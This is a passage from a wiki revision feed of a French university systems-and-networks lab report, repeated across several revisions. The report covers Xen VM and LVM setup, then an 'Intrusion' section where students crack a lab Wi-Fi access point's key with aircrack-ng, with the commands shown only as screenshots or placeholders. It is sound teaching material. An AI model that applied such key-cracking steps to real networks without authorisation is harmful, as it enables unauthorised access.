La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Intrusion  ===&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clé trouvée]]&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Groupe6-IMA2021-3.png&amp;diff=52973</id>
		<title>Fichier:Groupe6-IMA2021-3.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Groupe6-IMA2021-3.png&amp;diff=52973"/>
				<updated>2020-11-02T13:49:28Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Groupe6-IMA2021-2.png&amp;diff=52972</id>
		<title>Fichier:Groupe6-IMA2021-2.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Groupe6-IMA2021-2.png&amp;diff=52972"/>
				<updated>2020-11-02T13:48:59Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52971</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52971"/>
				<updated>2020-11-02T13:47:46Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Intrusion  ===&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clé trouvée]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
Ajouter photo!!!&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52970</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52970"/>
				<updated>2020-11-02T13:46:37Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Intrusion  ===&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
....&lt;br /&gt;
....&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
Ajouter photo!!!&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Groupe6-IMA2021-1.png&amp;diff=52969</id>
		<title>Fichier:Groupe6-IMA2021-1.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Groupe6-IMA2021-1.png&amp;diff=52969"/>
				<updated>2020-11-02T13:45:48Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52968</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52968"/>
				<updated>2020-11-02T13:45:14Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Intrusion  ===&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|Key found]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
....&lt;br /&gt;
....&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
Ajouter photo!!!&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52967</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52967"/>
				<updated>2020-11-02T13:44:53Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Intrusion  ===&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021.png|600px|thumb|center|Key found]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
....&lt;br /&gt;
....&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
Ajouter photo!!!&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Jdd_KEY_FOUND.png&amp;diff=52965</id>
		<title>Fichier:Jdd KEY FOUND.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Jdd_KEY_FOUND.png&amp;diff=52965"/>
				<updated>2020-11-02T13:41:46Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Jdd_capture_paquets.png&amp;diff=52964</id>
		<title>Fichier:Jdd capture paquets.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Jdd_capture_paquets.png&amp;diff=52964"/>
				<updated>2020-11-02T13:40:38Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52764</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52764"/>
				<updated>2020-10-15T10:03:24Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Intrusion  ===&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
Ajouter photo!!&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
....&lt;br /&gt;
....&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
Ajouter photo!!!&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52754</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52754"/>
				<updated>2020-10-15T09:50:47Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52753</id>
